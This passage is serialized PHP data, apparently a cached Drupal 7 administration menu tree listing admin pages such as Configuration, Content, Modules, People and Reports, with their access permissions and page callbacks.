pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:13:{i:42;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"42\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/fields\";s:11:\"router_path\";s:20:\"admin/reports/fields\";s:10:\"link_title\";s:10:\"Field list\";s:7:\"options\";s:89:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:39:\"Overview of fields on all entity types.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"42\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer content types\";}\";s:13:\"page_callback\";s:20:\"field_ui_fields_list\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/fields\";s:5:\"title\";s:10:\"Field list\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:39:\"Overview of fields on all entity types.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:50;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"50\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/dblog\";s:11:\"router_path\";s:19:\"admin/reports/dblog\";s:10:\"link_title\";s:19:\"Recent log messages\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View events that have recently been logged.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"50\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:14:\"dblog_overview\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/dblog\";s:5:\"title\";s:19:\"Recent log messages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View events that have recently been logged.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:55;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"55\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/status\";s:11:\"router_path\";s:20:\"admin/reports/status\";s:10:\"link_title\";s:13:\"Status report\";s:7:\"options\";s:124:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-60\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"55\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"system_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/status\";s:5:\"title\";s:13:\"Status report\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:58;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"58\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:27:\"admin/reports/access-denied\";s:11:\"router_path\";s:27:\"admin/reports/access-denied\";s:10:\"link_title\";s:26:\"Top \'access denied\' errors\";s:7:\"options\";s:85:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:35:\"View \'access denied\' errors (403s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"58\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:31:\"a:1:{i:0;s:13:\"access denied\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:27:\"admin/reports/access-denied\";s:5:\"title\";s:26:\"Top \'access denied\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:35:\"View \'access denied\' errors (403s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:59;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"59\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:28:\"admin/reports/page-not-found\";s:11:\"router_path\";s:28:\"admin/reports/page-not-found\";s:10:\"link_title\";s:27:\"Top \'page not found\' errors\";s:7:\"options\";s:86:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:36:\"View \'page not found\' errors (404s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"59\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"page not found\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:28:\"admin/reports/page-not-found\";s:5:\"title\";s:27:\"Top \'page not found\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:36:\"View \'page not found\' errors (404s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:100;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"100\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/event/%\";s:11:\"router_path\";s:21:\"admin/reports/event/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"100\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:11:\"dblog_event\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/event/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:192;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"192\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/search\";s:11:\"router_path\";s:20:\"admin/reports/search\";s:10:\"link_title\";s:18:\"Top search phrases\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"View most popular search phrases.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"192\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"search\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/search\";s:5:\"title\";s:18:\"Top search phrases\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"View most popular search phrases.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:260;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"260\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/updates\";s:11:\"router_path\";s:21:\"admin/reports/updates\";s:10:\"link_title\";s:17:\"Available updates\";s:7:\"options\";s:132:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:82:\"Get a status report about available updates for your installed modules and themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-50\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"260\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site 